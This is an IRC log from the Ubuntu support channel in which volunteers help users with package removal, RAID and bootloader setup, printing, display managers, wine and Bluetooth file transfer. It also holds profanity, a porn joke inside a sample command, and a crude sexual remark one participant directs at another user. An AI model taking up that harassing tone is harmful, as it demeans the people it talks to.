psusiOmnifarious, ok, so you have two disks... each of which use gpt and have two partitions that are both linux md raid type members of raid1 volumes... one volume for / and one volume for /boot, is that correct?04:46
Roastededbian, no, I dont. Here's what happened...04:46
sebsebsebcentr0: ok04:46
edbianRoasted, You don't have a password for Ubuntu?  How do you log in?04:46
Roastededbian, I installed phpmyadmin because I wanted to set up a lamp server. I left everything default, and even left passwords blank becuase I wasnt SURE what I was doing yet. I went to log in to phpmyadmin and it errored out that it couldnt accept blank passwords. I thought, crap, maybe I needed to enter a password. So I removed phpmyadmin and reinstalled. When I added a PW this time, it bricked.04:46
Omnifariouspsusi: Essentially.  Volume for LVM and volume for /boot, but same difference for this purpose.04:47
=== SuP|Lobby is now known as Sup|Away
n2diyRoasted: the password for sudo is your user password.04:47
Roastededbian, this is a password for phpmyadmin - NOT Ubuntu04:47
Roastedn2diy, I know.04:47
ruben23hi how do i cehck the version of my ubuntu desktop if its 64 bit or 32 bit04:47
RoastedIt's asking for the database password. Not the system PW04:47
Roastededbian, how can I release locked files again?04:47
psusiOmnifarious, oh dear... so you have md0 = sda1 and sdb1, mirrored, which you are using as an lvm pv, and md1 = sda2 and sdb2, which you are using as /boot?04:47
RoastedI cant run this removal command cause 3 files are locked.04:47
majukruben23, uname -a04:48
edbianRoasted, You can either kill the processes that are using it or you can delete the lock file it's talking about.  It's better to end the processes.04:48
edbianRoasted, Again, to get a list of processes ps -e04:48
Jordan_URoasted: First, reboot just to be absolutely sure that no package manager is running.04:48
Roastededbian, right. but someone gave me a command earlier that auto nuked them.04:48
edbianRoasted, to kill one with kill <pidNumber>   or killall <processName>04:48
tucemiuxmajuk, so how can you tell if you have a 32 or 64 bit distro ?04:48
edbianRoasted, I'm not aware of a command like that.04:49
RoastedJordan_U, I did, but once I get terminal OR synaptic running after a fresh reboot, the same issues come back. Im working on a fresh reboot right now.04:49
phobos_anomalytucemiux: uname -a04:49
Omnifariouspsusi: Other way around.  sda1 + sdb1 = /boot04:49
majuktucemiux, uname -a04:49
Jordan_URoasted: Ok, then just "rm" the lock file.04:49
Omnifariouspsusi: And sda2 + sdb2 = LVM04:49
ruben23majuk i see it as x86_64 , but when i install skype i386 it wond installed04:49
sebsebseb!version | ruben2304:49
ubotturuben23: To find out what version of Ubuntu you have, type « lsb_release -a » in a !shell - To know the available version of a package, « apt-cache policy <package> »04:49
tucemiuxmajuk, 2.6.31-10-rt #153-Ubuntu SMP PREEMPT RT Tue Jan 12 10:42:21 UTC 2010 i686 GNU/Linux04:50
Chaos`Eternalany body know whether there exists some quick solution to bug https://bugs.launchpad.net/ubuntu/+source/linux/+bug/56614904:50
ruben23skype i 386 cannot install on ubuntu desktop x86_6404:50
majuktucemiux, Then you're on 32bit04:50
VkecIm currently trying to print from windows to a linux printer. How to i do this?04:50
psusiOmnifarious, why have a separate /boot?  I run without one04:50
sebsebseb!samba | Vkec04:51
ubottuVkec: Samba is the way to cooperate with Windows environments. Links with more info: https://wiki.ubuntu.com/MountWindowsSharesPermanently and https://help.ubuntu.com/10.04/serverguide/C/windows-networking.html - Samba can be administered via the web with SWAT.04:51
majukruben23, i386 = 32bit. You are running 64bit, as x86_64 indicates04:51
Roastededbian, http://pastebin.org/32924904:51
tucemiuxmajuk, so how can you tell if you have a 32 or 64 bit distro ?04:51
sebsebsebVkec: wrong factoid I guess04:51
Roastededbian, new errors, unrelated to what I saw before04:51
sebsebseb!cups  | Vkec04:51
ubottuVkec: Printing in Ubuntu is done with cups. See https://help.ubuntu.com/community/Printers - https://wiki.ubuntu.com/HardwareSupportComponentsPrinters - http://linuxprinting.org - Printer sharing: https://wiki.ubuntu.com/NetworkPrintingFromWindows04:51
VkecLast time used samba it never worked04:51
Omnifariouspsusi: Because I like putting / in LVM.  And I wanted to see if I could put / on btrfs which grub doesn't yet support.04:51
phobos_anomalytucemiux: you just found out that you are on a 32 bit distro04:51
sebsebseb!skype | ruben2304:52
ubotturuben23: To install Skype on Ubuntu, see https://help.ubuntu.com/community/Skype - To record on Skype, check: https://wiki.ubuntu.com/SkypeRecordingHowto - Please use open protocols instead if you can, see !Ekiga04:52
Omnifariouspsusi: And with Fedora, the way I install new versions uses the same /boot and creates a brand new / so I can continue to boot the old version when I'm done.04:52
FlamekebabIs there any way to use a different version of GDM that allows custom themes?04:52
sebsebsebFlamekebab: yes, but not in the repo and so on04:52
sebsebsebFlamekebab: also KDM is rather nice :)04:52
edbianRoasted, those files are not locked by the package manager.  I'm not sure what they're locked by.  No wonder we're having problems.  Files are only "locked" because a process is running.  Since you're getting the errors from trying to purge phpmyadmin I suspect that is what is running.  Why not try ending that and then purging?04:52
sebsebsebFlamekebab: oh and you could install the old GDM,  but well04:52
sebsebsebFlamekebab: not so easy as to just install it04:53
Flamekebabsebsebseb, I'm using the current 10.04 version of GDM04:53
Roastededbian, I have no idea how to nuke phpmyadmin. Ive never used it before. let me try ps and see if I can find it04:53
edbianRoasted, good call04:53
FlamekebabIt annoys me that I can't customise it beyond the background image04:53
Roastededbian, yeah, its not in ps. should I be using top?04:53
edbianRoasted, usually sudo killall phpmyadmin is a safe guess04:53
Roastededbian, ps only has 2 things listed04:53
edbianRoasted, ps -e04:53
sebsebsebFlamekebab: when I said yes, I was thinking Grub 2 for some reason04:53
Roastedno process found04:54
sebsebsebFlamekebab: GDM 2 can't just be themed04:54
psusiOmnifarious, ahh, true... grub doesn't support btrfs... ok... so your /boot partition is mirrored, and then you have a single lvm pv that is mirrored.. hrm...04:54
tucemiuxphobos_anomaly, thanks, majuk just broke it down for me in a PM04:54
sebsebsebFlamekebab: you can change the background thats about it04:54
edbianRoasted, ps is just processes using the processor at that moment by you04:54
Roastededbian, found one - phpmyadmin.post. when I killall phpmyadmin.post, says no process found. lol?04:54
Flamekebabsebsebseb, so are the advantages of GDM2 all under the hood?04:54
sebsebsebFlamekebab: basically yeah, well to be honest, what advantages as an  end user?04:54
Roastedhow can I kill via pid?04:54
edbianRoasted, can you kill it by process id?04:55
psusiOmnifarious, ok, so yea... you should be able to swing that... provided that you have a grub bios boot partition, if you insist on using gpt instead of msdos disk lables04:55
sebsebsebFlamekebab: GDM 2 exists since the developers felt like re writeing it basically04:55
edbianRoasted, The numbers listed are the pid's, you just kill <pid>04:55
majukRoasted, kill `pidof VLCISPLAYINGLOLPORN`04:55
sebsebsebFlamekebab: it has offered me no advantage at all over the old GDM04:55
majukThose are backticks, fyi04:55
Roastededbian, operation not permitted.04:55
Roastedsudo kill?04:55
Omnifariouspsusi: *grin*  Yes.  As I said, I was hoping grub could use block lists.  But that would require it figure out that all blocks on md0 are also blocks on sda.04:55
edbianRoasted, sudo ;)04:55
FlamekebabIs it possible to revert to the old version so I can have customised themes again?04:55
sebsebsebFlamekebab: yes, but  not as simple as just installing and using, so may as well try KDM :)04:56
FlamekebabI don't like the removal of customisation options, it's ridiculous04:56
Roastededbian, could apache be interfering with phpmyadmin?04:56
FlamekebabI'll try install KDM04:56
majukRoasted, Yea, if its not a process your user started, you'll have to sudo. Run the normal 'pidof $PROGRAMNAME' first04:56
sebsebsebFlamekebab: indeed GDM 2 sucks04:56
majukMake sure it spits out a good PID, otherwise you're spinning your wheels04:56
Roastedmajuk, gotcha. thanks.04:56
edbianRoasted, no idea.  Never set them up.  I mean they do work together but you should be able to remove phpmyadmin without affecting apache at all.04:56
Roasteda good pid?04:56
psusiOmnifarious, yea... which is neigh impossible to do reliabley, so iirc, they refuse to do it... if you are using gpt partitions, and tell grub to install to sda, it must have a bios boot partition to put the core image into04:56
FlamekebabHow do I choose KDM over GDM? I've got it installed04:56
majukRoasted, /A/ pid04:56
Roastededbian, let me try removing it again...04:56
majukAs versus none, if it can't find the program name you specify04:56
sebsebsebFlamekebab: KDM KDE Display Manager, so will want to put on quite a bit of KDE stuff, if you haven't already got at least one KDE app installed, but ah well this is not WIndows,  this is designed to have many programs installed :)04:57
Roastededbian, still erroring out.04:57
Roastedwheres the bottle at...04:57
Flamekebabsebsebseb, I've got it installed, dude04:57
FlamekebabHow do I activate it?04:57
edbianRoasted, Same errors?04:57
sebsebsebFlamekebab: when you  installed kdm it should have asked  yo which one to use GDM or KDM04:57
Roastededbian, yes, locked by another process, etc.04:58
sebsebsebFlamekebab: and you go for KDM obviosuly04:58
Roastedlet me rm them04:58
Jordan_UOmnifarious: You're going to need to grab the grub-pc and grub-common packages from either maverick or debian unstable to use btrfs on / (for grub-mkconfig, not booting itself)04:58
Roastededbian, errors were encountered while processing - phpmyadmin. E sub process /usr/bin/dpkg returned an error code (1)04:59
OmnifariousJordan_U: Thanks for the warning.  :-)05:00
edbianRoasted, yeah, that's so generic I was looking at the lock files about debconf/passwords.dat05:00
Roastededbian, removal via synaptic = E: phpmyadmin: subprocess installed pre-removal script returned error exit status 1005:00
Jordan_UOmnifarious: You're welcome :)05:00
centr0sebsebseb, so i created a new user..  tried to cp the clean files to the old user but that didnt work.  so i decided to stay with the newly created user..  deleted the old user and tried a sudo command with the new user..  and it isnt setup for sudo..05:00
sebsebsebcentr0: uh yeah05:01
sebsebsebcentr0: I said you would have to set up sudo05:01
edbianRoasted, look at this: http://www.linux-solved.com/post/SOLVED-Cant-remove-phpmyadmin-package-install-21112.html05:01
centr0sebsebseb, uh oh.  LOL05:01
Roastededbian, OMG. lol. did I just fix this?05:01
gbear14275can anyone tell me how to enable iommu in my BIOS?  I haven't seen anything like that in any of the options...  Is this something I need to do on my kernel?05:01
Dargonwhat happened?05:01
edbianRoasted, IDK, did you?  What did you do?05:01
Roastededbian, I didnt realize synaptic had a reinstall option. I hit reinstall, then removed it, then "completely" removed it.05:01
sebsebsebcentr0: now I think you would need recovery mode, or a Live CD, to give that new user sudo, but I don't know the commands also05:01
Roastedno errors05:01
centr0sebsebseb, ill try recovery.. i got the cmd. thanks for the help though!05:02
edbianRoasted, awesome!  "that was easy"05:02
sebsebsebcentr0: you know which command to use?05:02
Roastededbian, is there a reinstall command via terminal?05:02
edbianRoasted, IDK, probably05:02
centr0usermod -a -G <something>  i need to look at my other pc in the other room that has the window open. :P05:02
sebsebsebcentr0: ok05:03
edbianRoasted, sudo apt-get install packageName --reinstall05:03
centr0thanks a lot man :)05:03
Dargonis there an ebox mod to do stuff to the apache config?05:03
Roastededbian, good tip. thanks for your help bro. gonna retry this now.05:03
Roastededbian, lets see if it backfires. :)05:03
edbianRoasted, no problem!05:03
edbianRoasted, good luck05:03
Roastedthanks much05:03
Roastededbian, well, it looks better, but Im still having the issue I originally had where I was unable to log into phpmyadmin due to the lack of credentials.05:05
edbianRoasted, I don't know if I can help with that.  Never used phpmyadmin05:05
=== radar3d is now known as radar3d|Zzz
n2diyRoasted: in a terminal, have you tried sudo phpmyadmin password?05:07
Roastedn2diy, hang on. I think this is a mysql error and not a phpmyadmin error. going to redo mysql quick05:07
spezticlehow do i change the menu contents of right clicking?05:08
* fulldarkness is away: like mklove05:08
rww!away > fulldarkness05:09
ubottufulldarkness, please see my private message05:09
VkecI cant seem to get this printing to work05:10
Vkeci did what this page said https://help.ubuntu.com/community/NetworkPrintingFromWinXP05:11
Vkecbut it didnt work05:11
nakhow do I get internet access with a b43 wireless card and no wired interface?05:12
rwwnak: Do you have another computer you can use to copy the files to USB or something?05:13
rwwor actually, never mind, you can just use installation media05:14
rwwnak: https://help.ubuntu.com/community/WifiDocs/Driver/bcm43xx#No%20Internet%20Access05:14
nakrww: no05:14
spezticledoes anyone know what files define menus?05:14
Jordan_Unak: There is no way that you can copy files from the computer you're currently using to the one that can't connect to the internet?05:15
VkecIm currently trying to print from windows to a linux printer. How to i do this?05:16
Vkeci did what this page said https://help.ubuntu.com/community/NetworkPrintingFromWinXP05:16
Vkecbut it didnt work05:16
Vkecwell thanks a lot05:18
nakis synaptic installed in ubuntu05:19
n2diynak yes05:19
gbear14275is there a way to look at motherboard options through CLI?05:22
n2diygbear14275: lshw05:22
nomad77gbear14275: dmidecode but its not always accurate05:23
Nitrus^1i've updated from 8.04 to latest, and now i have 13,681 unrecognized tasks in aptitude, how do i clean these up?05:23
droopalHi, I am having problems with Facebooks photo uploader, its something to do with java not starting.05:24
n2diydroopal: check the prefrences in your browser.05:25
droopalI just found out it could be a problem with the simlink for java not being in /usr/lib/mozilla but I dont understand what that means.05:25
droopalI'm using Google Chrome05:26
droopalit seems there is a bug05:26
n2diydroopal: check the prefrences in your browser.05:26
droopalcant you explain what i need to check?05:26
n2diydroopal: check the prefrences in your browser.05:26
droopalok, but I dont know what it is I am supposed to be checking.05:27
n2diydroopal: go to menu edit/prefrences in your browser.05:27
droopalotherwise I would have already05:27
droopalI am in Google Chrome remember05:27
droopalno edit preferences05:27
no-namewhen vmware workstation 7 (ubuntu) downloads vmware tools, what directory does it download too?05:27
n2diydroopal: chrome doesn't have drop down menus?05:28
droopalthere is an options section, but nothing to do with java05:28
n2diydroopal: what about under edit?05:29
droopalI have checked that, and I ahve found it its the cimlink05:29
droopalbut how do I add a simlink for java in that directory05:29
droopalthere is no edit drop down menu in google chrome05:30
droopalgetting back to my original question, how do I add a simlink to /usr/lib/mozilla from java05:31
droopalthanks, that was huge help,05:32
zkriessedroopal: Please have patience05:32
zkriessedroopal: And don't get discouraged right away05:33
droopalit would be ok, if after what I had explained, the op kept on telling me to do something else, and not listening to me05:33
droopalbelieve me, I have been trying ecerything to get this java to work in google chrome05:34
nomad77 droopal does it work in firefox?05:34
mad_dogdroopal what site are you using the java on?05:35
droopalapparently, from what I have found its a bug05:36
droopaljava 6 just made sure I have right up to date version now05:36
droopalthe upload tool wont load05:36
droopalthe photo upload tool sorry05:36
=== kevdog_ is now known as kevdog
Jordan_Udroopal: Either launchpad is being buggy or that's not the correct link05:37
mad_dogdroopal k..facebook05:37
kochiihi all...is there an app on ubuntu for hooking my ps3 a media server05:37
droopalist the java applet, and that is the bug, the simlink to /usr/lib/mozilla05:37
droopalneeds to be added05:38
radikalgood night everybody05:38
droopaladd a 7 on the end of that big number05:38
droopalsorry just noticed05:38
droopalbug numkber05:38
dannoffskochii: try https://help.ubuntu.com/community/MediaTomb05:38
droopalI am in the UK, its 5.30am, feeling a bit yuchy as I havent had much sleep, so sorry for the typos05:39
dannoffskochii: there is also an app calles ps3mediaserver  https://help.ubuntu.com/community/Ps3MediaServer05:39
radikalsomebody can help, my problem is i have installed  art manager and download some themes and can't install  whit emeral theme and theme installer05:39
kochiithank you dannoffs05:39
dannoffsKochii: Media tomb uses upnp and ps3MediaServer uses DLNA. I'm not sure of the benifits of either05:40
hiexporadikal, whats the prob05:40
kochiidannoffs: ok, will play around with them...thanks again05:42
FlynsarmyIn my fstab i have this line http://pastebin.com/KUn6PRjy however it results in apps (specifically php) not being able to chmod. How can i fix this?05:42
dannoffskochii: glad to be of service05:42
leftisti have had no success in the last 2 versions of ubuntu to run vlc.  it will bring up the base interface however when i select any video format it just shuts down. can someone tip me off? i have compiz and cairo dock running in 9.10 ubuntu and just installed the latest vlc with the same problem05:43
spezticlewhere is the location of the main ubuntu configuration files05:43
edbianFlynsarmy, That line should have nothing to do with php unless.  You cannot chmod files on an NTFS partition because that filesystem doesn't support linux permissions05:44
* tomswartz07 waves hello05:44
tomswartz07hi all05:44
=== TannerF is now known as TanneF|rawrimasl
plymouthheyas, how do i reset my wireless access point? it's a d-link05:44
linuxwhat's name of program that finds wireless devices in ubuntu?05:44
majukleftist, open a terminal window and run VLC from there. Then load the video. You can see errors and log entries in the terminal window that way05:44
dannoffsspezticle: config files to do what?05:44
plymouthi want to clear the passwords etc, since ive forgotten it05:44
=== TanneF|rawrimasl is now known as TannerF|sleeping
leftistmajuk just a sec05:44
histoplymouth: you might want ot check dlinks site for help. this is a ubuntu support channel05:45
n2diyplymouth: push the reset button on it?05:45
dannoffsplymouth: hold the power button?05:46
spezticledannoffs: define menu's, open with applications, etc. currently i can only assign open with rules to 'folder' not individual devices.05:46
plymouthn2diy: doesn't seem to work - i mean it still asks for l/p when i connect to it, and the factory dfault 'admin' and 'admin' dont let me through05:46
karmstDoes anyone know of a way to create a deduplication storage array / folder?05:46
hiexpohold on to the spark plug wire  :)05:46
histoplymouth: usually they have a reset button that you have to push with a pen.  To reset to factory settings05:46
dannoffsspezticle: have you tried changing settings with gconf?05:47
dannoffsspezticle: or just going through the preference menu?05:47
majukkarmst, 'Deduplication'? Are you trying to back up all of / or something?05:47
karmstI want to backup the entire server farm05:47
ubottuThere are many ways to back your system up. Here's a few: https://help.ubuntu.com/community/BackupYourSystem , https://help.ubuntu.com/community/DuplicityBackupHowto , https://wiki.ubuntu.com/HomeUserBackup , https://help.ubuntu.com/community/MondoMindi - See also !sbackup and !cloning05:48
majukkarmst, Ah, I see. Uhhh, I believe tar can throw out duplicate files, so you could tell it to just output its file list that it would compress with those options enabled05:48
majukThen use the output to construct an array of sorts.05:49
spezticlethe preferences menu doesn't individualize. it's only for all location types. setting open with basero for memory cards sets open with for everything like when i click on places/home it opens with brasero then05:49
wildbatplymouth, it should have a reset "button"/hole ~05:49
majukThat's my best solution. Sorry man. :D05:49
wildbatplymouth, have a toothpick or paperclip poke it for 5 sec05:49
hiexpoplymouth,  rightclick on net-work manager see what eth your on you have  to assign a static ip to it no dhcp05:49
spezticledannoffs: and i'm not sure how to edit with gconf. is it command line?05:49
FlamekebabAny ideas why Ubuntu has started asking for a password to my keyring when I login?05:50
dannoffsspezticle: hit Alt-F2 and type gconf-editor and you get a GUI window05:50
wildbatFlamekebab, wifi ?05:50
FlamekebabDon't even have a wireless card05:51
wildbatFlamekebab, messnger tools?05:51
hiexpoupon every reboot ubuntu goes up one every boot eth 1  2  3 4 etc so ifyou assigned a static ip before than rebooted it will no longer apply because your not on thateth anymore bet thats the problem there most miss that one05:51
Jordan_Uhiexpo: Are you asking a question?05:53
majukhiexpo, Do /what/ now?05:53
majukYour NIC should get the same eth assignment every boot, not change.05:54
hiexpono was trying to hel another but yes i have that problem also everytimei reboot my eth changes increases by one05:55
=== star_ is now known as Guest52452
Jordan_Uhiexpo: Who?05:56
majukMan, that is really odd. It shouldn't do that.05:56
majukhiexpo, ^^05:56
n2diyhiexpo: you can force your ip with ifconfig eth0 xxx.xxx.xxx.xxx05:56
hiexpoi think it was plymouth05:56
spezticledannoffs: there is no configuration entry for default application handling in gconf05:56
Jordan_U!cn | Guest52452 improve05:57
ubottuGuest52452 improve: For Ubuntu help in Chinese 您可以访问中文频道: #ubuntu-cn 或者 #ubuntu-tw  或者 #ubuntu-hk05:57
majukn2diy, But if increases its num assignment every boot, it wouldn't stick05:57
hiexpomajuk,  exactly05:57
n2diyhiexpo: stop re-booting then! :)05:57
majukhiexpo, That's odd. I would look at your bootup logs in dmesg and see what it says when it turns up your NIC05:58
dannoffsdesktop>gnome>applications If that's not what you're looking for someone else will have to help05:58
hiexpowhere is the dmes log05:59
n2diyhiexpo: /var/logs05:59
majukhiexpo, run "dmesg|less" from your cli05:59
majukhiexpo, arrows to scroll, page scroll with spacebar06:00
dannoffsI'm out06:00
spezticlein fact gconf seems to be useless.disabling automount_open does not infact stop automount_opening.06:00
Pr3nt1c3can someone _PLEASE_ help me figure out why I can't install eve-online... keep getting 'unable to elevate, error 1' message...06:01
Pr3nt1c3it was working fine under linuxmint7 / ubuntu9.0406:01
Pr3nt1c3but now _EPIC FAIL_06:01
Pr3nt1c3seriously.... wtf?!?!?06:02
Pr3nt1c3I've been to the wine-site, I've been to the game site... and no luck so far06:03
FlamekebabRight, I'm back. Still trying to figure out why a gksu-esque window is popping up whenever I login stating "The login keyring did not get unlocked when you logged into your computer"06:03
Jordan_U!es | microalgologo06:04
ubottumicroalgologo: En la mayoría de canales de Ubuntu se habla sólo en inglés. Si busca ayuda en español o charlar entra en el canal #ubuntu-es. Escribe "/join #ubuntu-es" (sin comillas) y dale a enter.06:04
FlamekebabAnyone know why I would see this every time I login: http://i49.tinypic.com/ajumqd.png06:04
hiexpoi couldn't come up with a answer nothing in logs that i can grab06:05
gaysquirrelhey can anyone help me real quick?06:05
gaysquirrelhey can anyone help me real quick?06:06
unopFlamekebab, your keyring password is different to your login password?  or you have GDM log you in automatically?06:06
unop!ask | gaysquirrel06:06
ubottugaysquirrel: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)06:06
Pr3nt1c3anyone here play eve and actually get an install to work???????06:06
majukPr3nt1c3, http://forums.newsbin.com/viewtopic.php?p=16151006:06
Flamekebabunop, I've not changed my password, I have switched from GDM to KDM, if that makes a difference06:07
PipHello, is the package named xserver-org-video-intel the same package as xf86-video-intel on this web site --> http://intellinuxgraphics.org/download.html06:07
unopFlamekebab, do you have KDM log you in automatically?06:07
gaysquirrelcan somebody explain to me how to transfer files from my computer running lucid lynx to a nokia 5230 using bluetooth06:07
majukPr3nt1c3, "As an experiment you can rename your $HOME/.wine directory and run the installer again - this makes a brand new 'windows install' and at least it will tell you if it's a problem with an old installation. You can delete the new .wine directory and go back to the old one."06:07
Flamekebabunop, no, I type my details in06:07
unopFlamekebab, you've not said anything about both passwords being same or different. are they?06:08
gaysquirrelcan somebody explain to me how to transfer files from my computer running lucid lynx to a nokia 5230 using bluetooth06:08
binarymegaysquirrel, is the computer a laptop?06:08
Jordan_UFlamekebab: It may be that KDM isn't passing your password on to gnome-keyring06:08
FlamekebabI've not changed any passwords, unop, so both should be the same as far as I understand things.06:08
Pr3nt1c3what should I rename it to?06:09
FlamekebabJordan_U, any suggestions as to how to remedy that?06:09
majukPr3nt1c3, Anything?06:09
gaysquirrelno its a dell pc running lucid lynx binaryme and im using a bluetooh dongle06:09
Jordan_UFlamekebab: Install GDM ;)06:09
majukI enjoy rubberbabybuggybumpers06:09
Pr3nt1c3seriously so ./whine would work?06:09
majukBut I'm a masochist.06:09
Jordan_U!ot | majuk06:09
ubottumajuk: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!06:09
FlamekebabJordan_U, GDM has removed theme support06:09
binarymegaysquirrel, ok, have you got bluetooth switched on and 'visible' on both?06:10
Pr3nt1c3amazing... works06:10
unopFlamekebab, http://ubuntuforums.org/showthread.php?p=833839306:10
gaysquirrelya binaryme and i have the bluetooth app open and connected to the phone but it looks like i can only share files from my phone to the computer not the other way around06:10
majukPr3nt1c3, Yea, sometimes Wine trips itself out and can't gain admin privs. Its a odd bugger. Just gotta play around with it sometimes.06:11
Pr3nt1c3you'd be suprised at how many ppl I'06:12
gbear14275can I inspect a symlink to tell where it goes?06:12
binarymegaysquirrel, it is possible to connect different bluetooth devices:  headphones, modem, etc.  are you sure it is the correct type of connection?06:12
Pr3nt1c3ve tried to get a solution from... but you're link worked like majik06:12
anon_anyone know why my webcam is on at random times?06:12
chris|gbear14275, ls -l symlink06:12
Jordan_Ugbear14275: "readlink" or "ls -l"06:12
gaysquirrelya i looked that up and it says its capable ot bluetooth file transfer06:13
Flamekebabunop, thanks, I'll give it a shot06:13
gbear14275$ readlink 0000\:06\:00.006:13
gbear14275can I expand that Jordan_U?06:13
anon_it's mostly if i put my system into standby, and then boot up, the cam light is on and looking me in the face, am i being ponographised?06:13
Jordan_Ugbear14275: "expand"?06:14
binarymegaysquirrel, if you click on "browse files on device" on your pc, can you access the phone?06:14
anon_now i'm way more interested in what gbear14275 meant about expand06:14
gbear14275../../../devices  <--  I can't tell what directory this is in...06:14
plymouthgrr, im having grave problems with my D-Link wireless accesspoint. I am trying to change the password because i forgot it and im wanting my ps3 to access the net. However when i 'reset' the access point it doesn't seem to change anything, EXCEPT that now i acn't connected to it on Anyone have any ideas?06:14
gaysquirreli dont see that option binaryme06:15
majukplymouth, It reset to .1 ?06:15
anon_plymouth, you held the tiny button down for what seems like an eternity?06:15
anon_should be your default gateway...?06:15
Jordan_Ugbear14275: readlink -f06:15
n2diyplymouth, try connecting to
binarymegaysquirrel, do you have the bluetooth icon in the panel (top right)?06:16
gbear14275Jordan_U: thanks06:16
Jordan_Ugbear14275: You're welcome.06:16
gaysquirrelbinaryme, in my pc?06:17
Zelozeloshow can i save streamed video?06:17
anon_plymouth, password  probably admin06:17
=== kevdog_ is now known as kevdog
binarymegaysquirrel, yep.  where the clock and network manager, etc is06:17
PipHi, I have an Intel 82815 graphic controller, and there is the intel video driver package installed, but the max resolution is only 800x600 instead of 1024x768, and what's worse, the screen doens't fill the physical screen06:18
* Pr3nt1c3 wants gaysquirrel to change his name to "totallynutz"06:18
anon_if we were both squirrels would you let me bust a nut in your hole?06:18
gaysquirrelbinaryme, nope06:18
* Pr3nt1c3 is embarrassed... he has an email with 'squirrel' in it06:19
* Pr3nt1c3 spews06:19
binarymegaysquirrel, are you using ubuntu gnome, or kde?06:19
Pr3nt1c3speaking of desktop environs.... ow do I change from gnome to lxde / xfce???06:20
gaysquirrelbinaryme, idk lucid lynx thats all i know06:20
lostanyone got any problems with wine and itunes06:20
spezticlesudo apt-get install xfce406:20
spezticleor sudo apt-get install xubuntu-desktop06:20
anon_no problems at all, lost06:20
hiexpoi think i found the problem correct me if im wrong when i opened the  /etc/network/interfaces  all i have there is   auto lo than next line is iface .lo inet loopback06:21
binarymegaysquirrel, ok, do you have a menu bar (panel) at the top os the screen?06:21
unophiexpo, that's normal06:21
gaysquirrelbinaryme, yup06:21
hiexpounop, ok06:22
n2diyhiexpo: ok lo run sudo ifconfig eth0 xxx.xxx.xxx.xxx, and then sudo ifup eth006:22
MahdiI'm using UBUNTU 10.4 x64 with 2GB RAM06:22
Mahdibut my free memory never is lewer than 70% !!!06:22
MahdiHow can I find the problem ?06:22
binarymegaysquirrel, do you see the network manager icon (two little computer sceens) in the mune on the top right?06:22
FloodBot2Mahdi: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.06:22
=== linux is now known as FSR
binarymegaysquirrel,  mune - menu06:23
hiexpon2diy,  - whats your xxx. xxx ip?06:23
gaysquirrelbinaryme, no all i see is the date/time a messenger bubble, my name and a power button06:23
spezticleMahdi: it's not a problem, ubuntu uses your free memory to cache things to run things faster instead of not doing anything with free ram06:23
n2diyhiexpo: 192.168.1.xxx06:23
`agentul^007hi all06:23
spezticleMahdi: as more memory is needed for ram, cache gets pulled out and the ram is used06:23
Pr3nt1c3yeah spezticle.... but will that mean I have xfxce as my boot-in desktop?06:23
hiexpois thatwhat xxx.xxx your are refering to is ip?06:24
sylzjoin #ubuntu-cn06:24
n2diyhiexpo: yes06:24
binarymegaysquirrel, ok, can you right click on the panel (where there are no icons) and then click on "add to panel"  then fin "notification area" and add it06:24
spezticlePr3nt1c3: if you install install xubuntu-desktop and remove ubuntu-desktop gnome should be no more on your system06:24
Mahdispezticle : Thanks ... but if my memory become full ,ubuntu will be very very slow and I cannot move the mouse to close some programs !!!06:25
Mahdispezticle : and ubuntu does not use any of swap space !06:25
gaysquirrelbinaryme, ok done06:25
binarymegaysquirrel, do you see the bluetooth icon now?06:26
spezticleMahdi:  well, i don't know enough about the memory systems working with ubuntu. i just know that i thought the same thing you did, it seemed like it was eating my ram, but i found out it's supposed to be that way06:26
gaysquirrelbinaryme, nope lol06:27
* tertl3 eats RAM for his 4th meal06:27
hiexpon2diy,  - see i get error no such device because i don't have eth0 anymore i am on eth59 now06:27
binarymegaysquirrel, ok, there is another one called "indicator applet", try that06:27
Mahdispezticle : Is there a system monitor software better than System Monitor ? I wanna find memory consuming processes :D06:27
n2diyhiexpo: ok, so sub. eth59 for eth006:28
spezticleMahdi: i dont know personally. system monitor works well enough for me so i haven't looked for an alternative06:28
spezticleMahdi:  i'm sure there is though06:28
moetunesMahdi: in terminal do   top06:28
gaysquirrelbinaryme, ok i see it06:29
spezticleMahdi: use the ubuntu software center and search for memory monitor or something like that?06:29
binarymegaysquirrel, left click it and see if you can "browse files on device"06:29
* wildbat execute kill -9 tertl3, RAM is free again. 06:30
gaysquirrelbinaryme, sweet figured it out man i love u lol06:30
binarymegaysquirrel,  no worries.  enjoy!06:30
gaysquirrelbinaryme, haha thanks man my bro set me up with this shit then moved out so im pretty lost haha06:31
hiexpook onlything i can it has done is change my ip address06:31
DanZ3Hi, I just installed wubi and am now installing updates. Something popped up asking me if I want to continue installing grub. What should I do?06:31
nUboon2Agehiexpo: that's what my /etc/network/interfaces file has also.06:31
gbear14275Is it possible to setup a VM to have a public facing IP when you only have 1 IP to assign?  I want to put a webserver on a headless server06:31
binarymegaysquirrel, there's a bit of a learning curve, but stick with it!  it's worth it!06:31
gbear14275which is a VM  (sorry add to previous sentance)06:32
hiexponUboon2Age,  ya i guess thats common06:32
gbear14275I've been spending hours trying to figure out how to do PCI passthrough so I can passthrough a NIC but am wondering if there is an easier way06:32
=== Flomaster is now known as MrDoLittle
spezticleMahdi: mgm system monitor seems pretty informative06:33
gaysquirrelbinaryme, maybe if my computer was better but it barely works06:33
=== MrDoLittle is now known as Flomaster
binarymegaysquirrel, is it old?  do you know the specifications?06:34
gaysquirrelits a dell b110 haha old as sheet binaryme06:34
* Pr3nt1c3 really wants gaysquirrel to change nick to "nuttynutnut"06:34
gaysquirrelbinaryme,  726 or so mbs ram shitty ass old ati video card06:34
ubottuPlease watch your language and topic to help keep this channel family friendly.06:35
Pr3nt1c3I'm not swearing / being leary ubottu06:35
binarymegaysquirrel, well, if you are adventurous and (once you are more comportable with ubuntu), you could try loading an LXDE version or other 'light' version... it will run much better on an old machine06:35
nUboon2Agegaysquirrel:  726 isn't too bad for ram.  I was running w/ 238 before.  Now at 1gb I feel like I'm in heaven.06:36
gbear14275whats the "nominate for release" button do in launchpad?06:36
n2diygaysquirrel: Xubuntu is better suited for old hardware.06:36
gaysquirrelya n2diy nUboon2Age binaryme idk how i would use these light versions and what not maybe theres a guide somewhere?06:37
